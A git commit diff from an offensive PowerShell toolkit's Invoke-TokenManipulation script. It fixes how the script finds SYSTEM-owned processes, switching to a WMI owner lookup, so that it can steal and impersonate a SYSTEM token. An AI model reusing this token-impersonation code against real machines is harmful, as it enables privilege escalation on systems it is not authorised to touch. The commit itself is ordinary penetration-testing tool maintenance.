authorMatt Graeber <matt@exploit-monday.com>2016-03-10 16:48:37 -0800
committerMatt Graeber <matt@exploit-monday.com>2016-03-10 16:48:37 -0800
commitf305e31cf56ced7941ccbd7864a3f372037dc91c (patch)
tree399b7f36de45838279df8428b68a7b91fcd4650c
parent2e1d49db33cdbef6c11c9723f6d4731e5875c803 (diff)
Bugfix: Invoke-TokenManipulation. Issue #112
Fixed the PSv4 dependency for obtaining process ownership information. Thanks to @mmashwani for suggesting the WMI solution.
-rw-r--r--Exfiltration/Invoke-TokenManipulation.ps125
1 files changed, 19 insertions, 6 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1
index ea30952..6558a63 100644
--- a/Exfiltration/Invoke-TokenManipulation.ps1
+++ b/Exfiltration/Invoke-TokenManipulation.ps1
@@ -1686,20 +1686,33 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
#Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges.
#We need to enumrate all processes running as SYSTEM and find one that we can use.
[string]$LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value
- $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq $LocalSystemNTAccount}
+
+ $SystemTokens = Get-WmiObject -Class Win32_Process | ForEach-Object {
+ $OwnerInfo = $_.GetOwner()
+
+ if ($OwnerInfo.Domain -and $OwnerInfo.User) {
+ $OwnerString = "$($OwnerInfo.Domain)\$($OwnerInfo.User)".ToUpper()
+
+ if ($OwnerString -eq $LocalSystemNTAccount.ToUpper()) {
+ $_
+ }
+ }
+ }
+
ForEach ($SystemToken in $SystemTokens)
{
- $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue
+ $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.ProcessId -WarningAction SilentlyContinue -ErrorAction SilentlyContinue
+ if ($SystemTokenInfo) { break }
}
- if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))
+ if ($SystemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))
{
Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens"
}
- if ($systemTokenInfo -ne $null -and $systemTokenInfo.hProcToken -ne [IntPtr]::Zero)
+ if ($SystemTokenInfo -ne $null -and $SystemTokenInfo.hProcToken -ne [IntPtr]::Zero)
{
- $CloseHandle.Invoke($systemTokenInfo.hProcToken) | Out-Null
- $systemTokenInfo = $null
+ $CloseHandle.Invoke($SystemTokenInfo.hProcToken) | Out-Null
+ $SystemTokenInfo = $null
}
$ProcessIds = get-process | where {$_.name -inotmatch "^csrss$" -and $_.name -inotmatch "^system$" -and $_.id -ne 0}